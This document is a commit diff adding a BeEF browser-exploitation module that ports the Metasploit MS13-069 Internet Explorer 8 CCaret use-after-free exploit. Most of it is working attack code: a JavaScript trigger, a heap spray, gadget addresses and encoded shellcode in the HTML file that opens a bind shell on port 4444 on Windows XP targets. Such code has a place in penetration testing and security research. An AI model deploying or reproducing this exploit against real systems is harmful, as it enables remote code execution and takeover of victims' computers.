Add 'IE MS13-069 CCaret Use-After-Free' exploit module from MSF

modules/exploits/local_host/ie_ms13_069_caret/command.js

@@ -0,0 +1,25 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+  // check browser
+  if (beef.browser.isIE8() != 1) {
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "error=Target browser is not Internet Explorer 8");
+    return
+  }
+
+  // check OS
+  if (beef.os.isWindows() != 1) {
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "error=Target OS is not Windows");
+    return
+  }
+
+  // exploit
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit attempted. Check for your shell on port 4444");
+  window.location = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/ie_ms13_069_caret.html';
+
+});

modules/exploits/local_host/ie_ms13_069_caret/config.yaml

@@ -0,0 +1,26 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+###
+# This module is a quick, dirty and butchered port of 'modules/exploits/windows/browser/ms13_069_caret.rb'
+# from the Metasploit Framework project. Written originally by corelanc0d3r (@corelanc0d3r) and sinn3r (@_sinn3r)
+# See: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms13_069_caret.rb
+###
+beef:
+    module:
+        ie_ms13_069_caret:
+            enable: true
+            category: ["Exploits", "Local Host"]
+            name: "IE MS13-069 CCaret Use-After-Free"
+            description: "This module exploits a use-after-free vulnerability in Internet Explorer. The vulnerability occurs in how the browser handles the caret (text cursor) object.<br/><br/>This exploit has been ported from <a href='http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms13_069_caret.rb'>ms13_069_caret.rb</a> from Metasploit, however it has limited target support and payloads.<br/><br/><b>Targets:</b> IE 8 on WinXP SP3<br/><b>Payloads:</b> bind shell on port 4444<br/><br/>For more browser based Metasploit exploits and payloads refer to the <a href='https://github.com/beefproject/beef/wiki/Metasploit' target='_blank'>Metasploit Integration for BeEF</a> page on the wiki."
+            authors: ['corelanc0d3r (@corelanc0d3r)', 'sinn3r (@_sinn3r)']
+            target:
+                user_notify:
+                    IE:
+                        min_ver: 8
+                        max_ver: 8
+                not_working:
+                    ALL:
+                        os: ["ALL"]

modules/exploits/local_host/ie_ms13_069_caret/ie_ms13_069_caret.html

@@ -0,0 +1,78 @@
+<!DOCTYPE html>
+<html>
+<head>
+<script>
+var freeReady = false;
+
+function getObject() {
+  var obj = '';
+  for (i=0; i < 11; i++) {
+    if (i==1) {
+      obj += unescape("%u7422%u77c3");
+    }
+    else if (i==2) {
+      obj += unescape("%u0105%u1ec2");
+    }
+    else if (i==3) {
+      obj += unescape("%u0101%u1ec2");
+    }
+    else {
+      obj += unescape("%u534c%u4552");
+    }
+  }
+  obj += "\u4545";
+  return obj;
+}
+
+function emptyAllocator(obj) {
+  for (var i = 0; i < 40; i++)
+  {
+    var e = document.createElement('div');
+    e.className = obj;
+  }
+}
+
+function spray(obj) {
+  for (var i = 0; i < 50; i++)
+  {
+    var e = document.createElement('div');
+    e.className = obj;
+    document.appendChild(e);
+  }
+}
+
+function putPayload() {
+  var p = unescape("%u5656%u474d%u715a%u5567%u4654%u5968%u4648%u4e64%u6444%u6168%u6978%u756e%u686b%u747a%u7a56%u586d%u4658%u706c%u524f%u4c66%u4e64%u7363%u4d45%u4746%u616a%u454d%u6f47%u7549%u6277%u4663%u5776%u7861%u7647%u7850%u7943%u5272%u7a57%u766b%u4756%u5072%u556f%u6972%u594b%u7857%u7141%u434f%u736a%u6573%u634a%u7946%u4279%u6c6b%u7243%u645a%u566e%u7661%u4358%u646e%u5957%u4657%u7557%u4754%u4b71%u7478%u4644%u5973%u664c%u5672%u6471%u5854%u5a69%u525a%u6d50%u476d%u6252%u596a%u6d52%u6743%u696b%u4a6e%u5067%u7151%u704a%u6a54%u7352%u6150%u6544%u5877%u5453%u7673%u4857%u7161%u6d7a%u7657%u5468%u6b74%u7873%u4665%u4a72%u594c%u496e%u706d%u6b72%u6e4a%u7371%u5a53%u5050%u5a64%u5857%u676c%u496e%u6b75%u0177%uc201%u011e%uc4d8%u0177%uc4d8%u0177%uc4d8%u0177%uc4d8%u0177%uc4d8%u0177%uc4d8%u0177%uc4d8%u0177%uc4d8%u0177%uc4d8%u0177%uc4d8%u1a77%uc4fa%u7577%u6647%u6075%uc3b8%u7977%ufffe%u18ff%uc1be%u5177%u32cb%u2c53%uc236%ubb77%uc5d9%u7177%uc2e0%u1377%uc50d%uc077%uffff%ubcff%uc58f%u1877%uc1be%u7c77%u25fa%ubc4e%uc58f%u1577%uc3ee%u1577%uc3ee%uef77%uc3ee%ubb77%uc5d9%u8c77%uc2a8%u9277%uc39f%u8477%uc3a1%ucc77%uc2aa%u6077%uc3b8%u2077%uc111%uf977%uc12d%u5977%uc354%u8177%u80c4%ufec7%udaff%ubfda%u2196%u3b1d%u74d9%uf424%u295d%ub1c9%u315a%u197d%uc583%u0304%u157d%ud474%u9a79%u1760%udc82%ud713%u578a%u5933%u574e%ua6cb%u64b0%ud0c3%u954f%u8313%u70c6%u9122%uf1bd%u2516%u54b5%uce9a%u4c9b%ua229%u6233%u099a%u4d62%ubc1b%u01aa%udedf%u5856%u0133%u9366%u4046%uceaf%u10a8%u8478%u851a%ud80d%ua4a6%u56c1%ude96%ua864%u5562%uf966%ue2da%ue120%uac51%u1090%uaeb6%u5bed%u05b3%u5d85%u5415%u6c66%u3b59%u4059%u4554%u679d%u3086%u9bd5%u433b%ue12e%uc6e7%u41b3%u706c%u7310%ue7a1%u7fd3%u630e%u63bb%ua091%u98b7%u471a%u2918%u6c58%u71bc%u0d3b%udfe5%u32ea%ub8f5%u9753%u2a7d%ua180%u23df%u9c65%ub3df%u97e1%u81ac%u03ae%uaa3b%u8a27%ucdbc%u6a12%u3052%u8b9c%uf77a%udbc8%ude14%ub070%udfe4%u17a5%u4fb5%ud815%u3065%ub0c5%ubf6f%ua03a%u158f%ue64d%u4d41%u811e%u71a3%u0db1%u972d%ubddb%u0f7b%u7c73%u9858%u7fe4%ub48a%u17bd%ud282%u1779%uf113%ub42a%u92bb%ud6b8%u827f%uf2bf%ucdd7%u95f8%ua3a2%u074b%ue9b2%ua43b%u7621%ua3bb%u2159%ue4ec%u38ac%u1978%u9296%ue09e%udc4e%u3f1a%ue3b3%ub2a3%uc78f%u0ab3%u4c0f%uc2e7%u1a46%ua551%uec30%u7f0b%ua6ee%u06db%u78dc%u069d%u0f09%ub641%u56e4%u777e%u5f61%u6507%ua011%u2dd2%ueb21%u077e%ub2aa%u15eb%u44b7%u5ac6%uc6ce%u22e2%ud635%u2787%u5071%u5a74%u35ea%uc97a%u1c0b");
+  var block = unescape("%u534c%u4552");
+  while (block.length < 0x80000) block += block;
+  block = p + block.substring(0, (0x80000-p.length-6)/2);
+
+  for (var i = 0; i < 0x300; i++)
+  {
+    var e = document.createElement('div');
+    e.className = block;
+    document.appendChild(e);
+  }
+}
+
+function trigger() {
+  if (freeReady) {
+    var obj = getObject();
+    emptyAllocator(obj);
+    document.write("U");
+    spray(obj);
+    putPayload();
+  }
+}
+
+window.onload = function() {
+  document.body.contentEditable = 'true';
+  document.execCommand('InsertInputPassword');
+  document.body.innerHTML = 'j';
+  freeReady = true;
+}
+</script>
+</head>
+<body onbeforeeditfocus="trigger()">
+</body>
+</html>

modules/exploits/local_host/ie_ms13_069_caret/module.rb

@@ -0,0 +1,22 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+###
+# This module is a quick, dirty and butchered port of 'modules/exploits/windows/browser/ms13_069_caret.rb'
+# from the Metasploit Framework project. Written originally by corelanc0d3r (@corelanc0d3r) and sinn3r (@_sinn3r)
+# See: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms13_069_caret.rb
+###
+class Ie_ms13_069_caret < BeEF::Core::Command
+
+  def pre_send
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/ie_ms13_069_caret/ie_ms13_069_caret.html', '/ie_ms13_069_caret', 'html')
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+#    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/ie_ms13_069_caret.html')
+  end
+
+end